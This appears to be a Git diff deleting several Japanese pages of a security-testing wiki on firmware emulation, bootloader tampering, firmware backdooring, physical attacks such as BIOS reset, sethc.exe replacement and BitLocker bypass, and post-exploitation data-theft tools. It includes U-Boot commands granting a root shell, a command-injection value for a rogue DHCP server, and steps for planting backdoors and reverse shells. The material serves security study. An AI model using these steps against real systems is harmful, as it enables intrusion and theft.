ファームウェアをエミュレートするプロセスは、デバイスの動作または個々のプログラムの**動的分析**を可能にします。このアプローチは、ハードウェアやアーキテクチャの依存関係に関する課題に直面することがありますが、ルートファイルシステムや特定のバイナリを、Raspberry Piのような一致するアーキテクチャとエンディアンネスを持つデバイスや、事前構築された仮想マシンに転送することで、さらなるテストを促進できます。
### 個々のバイナリのエミュレーション
単一のプログラムを調査するためには、プログラムのエンディアンネスとCPUアーキテクチャを特定することが重要です。
#### MIPSアーキテクチャの例
MIPSアーキテクチャのバイナリをエミュレートするには、次のコマンドを使用できます
```bash
file ./squashfs-root/bin/busybox
```
必要なエミュレーションツールをインストールするには:
```bash
sudo apt-get install qemu qemu-user qemu-user-static qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils
```
MIPSビッグエンディアンには `qemu-mips` が使用され、リトルエンディアンバイナリには `qemu-mipsel` が選択されます。
#### ARMアーキテクチャエミュレーション
ARMバイナリの場合、プロセスは似ており、エミュレーションには `qemu-arm` エミュレーターが利用されます。
### フルシステムエミュレーション
[Firmadyne](https://github.com/firmadyne/firmadyne)、[Firmware Analysis Toolkit](https://github.com/attify/firmware-analysis-toolkit) などのツールは、フルファームウェアエミュレーションを容易にし、プロセスを自動化し、動的分析を支援します。
## 実践における動的分析
この段階では、実際のデバイス環境またはエミュレートされたデバイス環境が分析に使用されます。OSおよびファイルシステムへのシェルアクセスを維持することが重要です。エミュレーションはハードウェアの相互作用を完全に模倣できない場合があるため、時折エミュレーションの再起動が必要です。分析はファイルシステムを再訪し、公開されたウェブページやネットワークサービスを悪用し、ブートローダーの脆弱性を探るべきです。ファームウェアの整合性テストは、潜在的なバックドアの脆弱性を特定するために重要です。
## 実行時分析技術
実行時分析は、gdb-multiarch、Frida、Ghidraなどのツールを使用して、プロセスまたはバイナリとその動作環境で相互作用し、ブレークポイントを設定し、ファジングやその他の技術を通じて脆弱性を特定します。
## バイナリの悪用と概念実証
特定された脆弱性のPoCを開発するには、ターゲットアーキテクチャの深い理解と低レベル言語でのプログラミングが必要です。組み込みシステムにおけるバイナリ実行時保護は稀ですが、存在する場合は、Return Oriented ProgrammingROPなどの技術が必要になることがあります。
## ファームウェア分析のための準備されたオペレーティングシステム
[AttifyOS](https://github.com/adi0x90/attifyos) や [EmbedOS](https://github.com/scriptingxss/EmbedOS) などのオペレーティングシステムは、必要なツールを備えたファームウェアセキュリティテストのための事前構成された環境を提供します。
## ファームウェアを分析するための準備されたOS
- [**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOSは、IoTデバイスのセキュリティ評価とペネトレーションテストを行うためのディストリビューションです。必要なツールがすべてロードされた事前構成された環境を提供することで、多くの時間を節約します。
- [**EmbedOS**](https://github.com/scriptingxss/EmbedOS): ファームウェアセキュリティテストツールがプリロードされたUbuntu 18.04に基づく組み込みセキュリティテストオペレーティングシステムです。
## 脆弱なファームウェアの練習
ファームウェアの脆弱性を発見する練習をするために、以下の脆弱なファームウェアプロジェクトを出発点として使用してください。
- OWASP IoTGoat
- [https://github.com/OWASP/IoTGoat](https://github.com/OWASP/IoTGoat)
- The Damn Vulnerable Router Firmware Project
- [https://github.com/praetorian-code/DVRF](https://github.com/praetorian-code/DVRF)
- Damn Vulnerable ARM Router (DVAR)
- [https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html](https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html)
- ARM-X
- [https://github.com/therealsaumil/armx#downloads](https://github.com/therealsaumil/armx#downloads)
- Azeria Labs VM 2.0
- [https://azeria-labs.com/lab-vm-2-0/](https://azeria-labs.com/lab-vm-2-0/)
- Damn Vulnerable IoT Device (DVID)
- [https://github.com/Vulcainreo/DVID](https://github.com/Vulcainreo/DVID)
## 参考文献
- [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
- [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://www.amazon.co.uk/Practical-IoT-Hacking-F-Chantzis/dp/1718500904)
## トレーニングと認証
- [https://www.attify-store.com/products/offensive-iot-exploitation](https://www.attify-store.com/products/offensive-iot-exploitation)
{{#include ../../banners/hacktricks-training.md}}

52
src/physical-attacks/firmware-analysis/bootloader-testing.md
View File

@ -1,52 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
デバイスの起動構成やブートローダーU-bootなどを変更するために推奨される手順は以下の通りです
1. **ブートローダーのインタプリタシェルにアクセス**
- ブート中に「0」やスペース、または他の特定された「マジックコード」を押してブートローダーのインタプリタシェルにアクセスします。
2. **ブート引数の変更**
- 次のコマンドを実行して、ブート引数に '`init=/bin/sh`' を追加し、シェルコマンドの実行を可能にします:
%%%
#printenv
#setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash:<partitiionInfo> rootfstype=<fstype> hasEeprom=0 5srst=0 init=/bin/sh
#saveenv
#boot
%%%
3. **TFTPサーバーの設定**
- ローカルネットワーク経由でイメージをロードするためにTFTPサーバーを設定します
%%%
#setenv ipaddr 192.168.2.2 #デバイスのローカルIP
#setenv serverip 192.168.2.1 #TFTPサーバーのIP
#saveenv
#reset
#ping 192.168.2.1 #ネットワークアクセスを確認
#tftp ${loadaddr} uImage-3.6.35 #loadaddrはファイルをロードするアドレスとTFTPサーバー上のイメージのファイル名を取ります
%%%
4. **`ubootwrite.py`の利用**
- `ubootwrite.py`を使用してU-bootイメージを書き込み、修正されたファームウェアをプッシュしてルートアクセスを取得します。
5. **デバッグ機能の確認**
- 詳細なログ記録、任意のカーネルのロード、または信頼できないソースからのブートなどのデバッグ機能が有効になっているか確認します。
6. **注意が必要なハードウェア干渉**
- デバイスのブートアップシーケンス中、特にカーネルが解凍される前に、1つのピンをグラウンドに接続し、SPIまたはNANDフラッシュチップと相互作用する際は注意が必要です。ピンをショートする前にNANDフラッシュチップのデータシートを参照してください。
7. **悪意のあるDHCPサーバーの設定**
- PXEブート中にデバイスが取り込む悪意のあるパラメータを持つ悪意のあるDHCPサーバーを設定します。MetasploitのMSFDHCP補助サーバーなどのツールを利用します。'FILENAME'パラメータをコマンドインジェクションコマンド(例:`'a";/bin/sh;#'`)で変更し、デバイスの起動手順に対する入力検証をテストします。
**注意**:デバイスのピンとの物理的な相互作用を伴う手順(\*アスタリスクでマークされたもの)は、デバイスを損傷しないように極めて注意して行うべきです。
## 参考文献
- [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
{{#include ../../banners/hacktricks-training.md}}

35
src/physical-attacks/firmware-analysis/firmware-integrity.md
View File

@ -1,35 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
## ファームウェアの整合性
**カスタムファームウェアおよび/またはコンパイルされたバイナリは、整合性または署名検証の欠陥を悪用するためにアップロードできます**。バックドアバインドシェルのコンパイルには以下の手順を実行できます:
1. ファームウェアはfirmware-mod-kit (FMK)を使用して抽出できます。
2. 対象のファームウェアアーキテクチャとエンディアンネスを特定する必要があります。
3. 環境に適した方法でBuildrootを使用してクロスコンパイラを構築できます。
4. クロスコンパイラを使用してバックドアを構築できます。
5. バックドアは抽出されたファームウェアの/usr/binディレクトリにコピーできます。
6. 適切なQEMUバイナリは抽出されたファームウェアのrootfsにコピーできます。
7. chrootとQEMUを使用してバックドアをエミュレートできます。
8. netcatを介してバックドアにアクセスできます。
9. QEMUバイナリは抽出されたファームウェアのrootfsから削除する必要があります。
10. 修正されたファームウェアはFMKを使用して再パッケージ化できます。
11. バックドア付きファームウェアは、ファームウェア分析ツールキットFATを使用してエミュレートし、netcatを使用してターゲットバックドアのIPとポートに接続することでテストできます。
動的分析、ブートローダー操作、またはハードウェアセキュリティテストを通じてルートシェルがすでに取得されている場合、インプラントやリバースシェルなどの事前コンパイルされた悪意のあるバイナリを実行できます。Metasploitフレームワークや'msfvenom'のような自動化されたペイロード/インプラントツールは、以下の手順を使用して活用できます:
1. 対象のファームウェアアーキテクチャとエンディアンネスを特定する必要があります。
2. Msfvenomを使用して、ターゲットペイロード、攻撃者ホストIP、リスニングポート番号、ファイルタイプ、アーキテクチャ、プラットフォーム、および出力ファイルを指定できます。
3. ペイロードは侵害されたデバイスに転送され、実行権限があることを確認する必要があります。
4. Metasploitはmsfconsoleを起動し、ペイロードに応じて設定を構成することで、受信リクエストを処理する準備をします。
5. 侵害されたデバイスでmeterpreterリバースシェルを実行できます。
6. meterpreterセッションが開くときに監視できます。
7. ポストエクスプロイト活動を実行できます。
可能であれば、起動スクリプト内の脆弱性を悪用して、再起動を通じてデバイスへの持続的なアクセスを取得できます。これらの脆弱性は、起動スクリプトが信頼できないマウントされた場所SDカードやルートファイルシステムの外にデータを保存するために使用されるフラッシュボリュームなどにあるコードを参照、[シンボリックリンク](https://www.chromium.org/chromium-os/chromiumos-design-docs/hardening-against-malicious-stateful-data)または依存する場合に発生します。
## 参考文献
- 詳細情報は[https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)を確認してください。
{{#include ../../banners/hacktricks-training.md}}

57
src/physical-attacks/physical-attacks.md
View File

@ -1,57 +0,0 @@
# 物理攻撃
{{#include ../banners/hacktricks-training.md}}
## BIOSパスワードの回復とシステムセキュリティ
**BIOSのリセット**は、いくつかの方法で実行できます。ほとんどのマザーボードには**バッテリー**が含まれており、これを約**30分**取り外すことで、パスワードを含むBIOS設定がリセットされます。あるいは、**マザーボード上のジャンパー**を調整して、特定のピンを接続することでこれらの設定をリセットすることもできます。
ハードウェアの調整が不可能または実用的でない場合、**ソフトウェアツール**が解決策を提供します。**Kali Linux**のようなディストリビューションを使用して**Live CD/USB**からシステムを実行することで、BIOSパスワードの回復を支援する**_killCmos_**や**_CmosPWD_**のようなツールにアクセスできます。
BIOSパスワードが不明な場合、通常、3回間違って入力するとエラーコードが表示されます。このコードは、[https://bios-pw.org](https://bios-pw.org)のようなウェブサイトで使用して、使用可能なパスワードを取得する可能性があります。
### UEFIセキュリティ
従来のBIOSの代わりに**UEFI**を使用する現代のシステムでは、ツール**chipsec**を利用してUEFI設定を分析および変更し、**Secure Boot**を無効にすることができます。これは次のコマンドで実行できます:
`python chipsec_main.py -module exploits.secure.boot.pk`
### RAM分析とコールドブート攻撃
RAMは電源が切れた後、通常**1〜2分**間データを保持します。この持続性は、液体窒素のような冷却物質を適用することで**10分**に延長できます。この延長された期間中に、**dd.exe**や**volatility**のようなツールを使用して**メモリダンプ**を作成し、分析することができます。
### ダイレクトメモリアクセスDMA攻撃
**INCEPTION**は、**物理メモリ操作**のために設計されたツールで、**FireWire**や**Thunderbolt**のようなインターフェースと互換性があります。これは、任意のパスワードを受け入れるようにメモリをパッチすることでログイン手続きをバイパスすることを可能にします。ただし、**Windows 10**システムには効果がありません。
### システムアクセスのためのLive CD/USB
**_sethc.exe_**や**_Utilman.exe_**のようなシステムバイナリを**_cmd.exe_**のコピーで変更することで、システム権限を持つコマンドプロンプトを提供できます。**chntpw**のようなツールを使用して、Windowsインストールの**SAM**ファイルを編集し、パスワードを変更することができます。
**Kon-Boot**は、WindowsカーネルやUEFIを一時的に変更することで、パスワードを知らなくてもWindowsシステムにログインできるツールです。詳細は[https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)で確認できます。
### Windowsセキュリティ機能の取り扱い
#### ブートおよびリカバリショートカット
- **Supr**: BIOS設定にアクセス。
- **F8**: リカバリモードに入る。
- Windowsバナーの後に**Shift**を押すことで、自動ログインをバイパスできます。
#### BAD USBデバイス
**Rubber Ducky**や**Teensyduino**のようなデバイスは、ターゲットコンピュータに接続されたときに事前定義されたペイロードを実行できる**bad USB**デバイスを作成するためのプラットフォームとして機能します。
#### ボリュームシャドウコピー
管理者権限を使用すると、PowerShellを通じて**SAM**ファイルを含む機密ファイルのコピーを作成できます。
### BitLocker暗号化のバイパス
BitLocker暗号化は、**メモリダンプファイル****MEMORY.DMP**)内に**リカバリパスワード**が見つかればバイパスできる可能性があります。これには、**Elcomsoft Forensic Disk Decryptor**や**Passware Kit Forensic**のようなツールを利用できます。
### リカバリキー追加のためのソーシャルエンジニアリング
新しいBitLockerリカバリキーは、ユーザーに新しいリカバリキーをゼロで構成するコマンドを実行させることで追加でき、これにより復号化プロセスが簡素化されます。
{{#include ../banners/hacktricks-training.md}}

16
src/post-exploitation.md
View File

@ -1,16 +0,0 @@
{{#include ./banners/hacktricks-training.md}}
## **ローカル l00t**
- [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): これらのスクリプトは、PEベクターを探すだけでなく、ファイルシステム内の機密情報も探します。
- [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagneプロジェクト**は、ローカルコンピュータに保存された**多数のパスワードを取得するために使用されるオープンソースアプリケーション**です。各ソフトウェアは、異なる技術プレーンテキスト、API、カスタムアルゴリズム、データベースなどを使用してパスワードを保存します。このツールは、最も一般的に使用されるソフトウェアのパスワードを見つける目的で開発されました。
## **外部サービス**
- [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): このモジュールは、アクセストークンを使用してConfluenceのAPIに接続し、PDFにエクスポートし、ターゲットがアクセスできるConfluence文書をダウンロードします。
- [**GD-Thief**](https://github.com/antman1p/GD-Thief): 攻撃者がアクセスできるターゲットのGoogle Driveからファイルを抽出するためのRed Teamツールで、Google Drive APIを介して行います。これには、すべての共有ファイル、共有ドライブからのすべてのファイル、およびターゲットがアクセスできるドメインドライブからのすべてのファイルが含まれます。
- [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): あなたがアクセスできるターゲット組織のGoogle People Directoryを抽出するためのRed Teamツールで、GoogleのPeople APIを介して行います。
- [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** これは、アクセストークンを与えられたSlackワークスペースから「興味深い」情報を抽出するためにネイティブSlack APIを使用するPythonで開発されたツールです。
- [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhoundは、Red TeamとBlue TeamがSlackワークスペース/組織の偵察を迅速に行うためのコマンドラインツールです。Slackhoundは、組織のユーザー、ファイル、メッセージなどの収集を迅速に検索可能にし、大きなオブジェクトはオフラインレビューのためにCSVに書き出されます。
{{#include ./banners/hacktricks-training.md}}

Some files were not shown because too many files have changed in this diff Show More